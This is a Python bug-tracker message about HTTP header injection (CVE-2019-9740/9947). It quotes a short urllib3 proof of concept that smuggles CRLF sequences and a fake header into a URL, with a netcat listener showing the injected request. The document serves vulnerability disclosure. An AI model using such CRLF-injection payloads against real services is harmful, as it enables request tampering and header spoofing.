[issue30458] [security][CVE-2019-9740][CVE-2019-9947] HTTP Header Injection (follow-up of CVE-2016-5699)
STINNER Victor
report at bugs.python.org
Wed Apr 10 08:32:58 EDT 2019
STINNER Victor <vstinner at redhat.com> added the comment:
bpo-36276 has been marked as a duplicate of this issue.
According to the following message, urllib3 is also vulnerable to HTTP Header Injection:
https://bugs.python.org/issue36276#msg337837
Copy of Alvin Chang's msg337837:
"""
I am also seeing the same issue with urllib3
import urllib3
pool_manager = urllib3.PoolManager()
host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
url = "http://" + host + ":8080/test/?test=a"
try:
info = pool_manager.request('GET', url).info()
print(info)
except Exception:
pass
nc -l localhost 7777
GET /?a=1 HTTP/1.1
X-injected: header
TEST: 123:8080/test/?test=a HTTP/1.1
Host: localhost:7777
Accept-Encoding: identity
"""
----------
_______________________________________
Python tracker <report at bugs.python.org>
<https://bugs.python.org/issue30458>
_______________________________________
More information about the Python-bugs-list
mailing list